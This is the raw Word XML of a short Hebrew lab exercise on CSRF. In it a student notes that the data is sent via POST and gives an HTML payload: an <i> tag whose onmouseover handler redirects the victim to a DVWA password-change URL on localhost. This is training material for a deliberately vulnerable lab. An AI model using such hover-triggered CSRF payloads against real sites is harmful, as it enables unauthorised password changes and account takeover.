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17F8" w14:textId="4CB76916" w:rsidR="009D0EE4" w:rsidRDefault="00057B7A" w:rsidP="00057B7A">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">אבטחת נתונים 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334756BF" w14:textId="696D72BA" w:rsidR="00057B7A" w:rsidRDefault="00057B7A" w:rsidP="00057B7A">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שאלה א': הנתונים עוברים בצורת </w:t>
      </w:r>
      <w:r>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D73E29" w14:textId="0612B827" w:rsidR="00057B7A" w:rsidRDefault="00057B7A" w:rsidP="00057B7A">
      <w:pPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שאלה ב': </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A295093" w14:textId="3083561D" w:rsidR="00057B7A" w:rsidRDefault="00057B7A" w:rsidP="00057B7A">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="0085058B">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="004A081B">
        <w:t xml:space="preserve"> onmouseover=</w:t>
      </w:r>
      <w:r w:rsidR="000D0578">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>window.location.href=</w:t>
      </w:r>
      <w:r w:rsidR="000D0578">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00057B7A">
        <w:t>localhost/DVWA/vulnerabilities/csrf/?password_new-pass&amp;password_conf-pass&amp;Change-Change#</w:t>
      </w:r>
      <w:r w:rsidR="000D0578">
        <w:t>’”</w:t>
      </w:r>
      <w:r w:rsidR="004A081B">
        <w:t>&gt; my lovely message</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidR="000D0578">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03486ABE" w14:textId="30CCD46D" w:rsidR="00057B7A" w:rsidRDefault="00057B7A" w:rsidP="00057B7A">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0005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7A"/>
    <w:rsid w:val="00057B7A"/>
    <w:rsid w:val="000D0578"/>
    <w:rsid w:val="004A081B"/>
    <w:rsid w:val="0085058B"/>
    <w:rsid w:val="009C7BFE"/>
    <w:rsid w:val="009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D812"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C8C8818F-198A-4FF7-9496-6AB3E9B8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שעיה</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>אורן שעיה</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2021-04-26T09:09:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-26T08:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-26T09:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>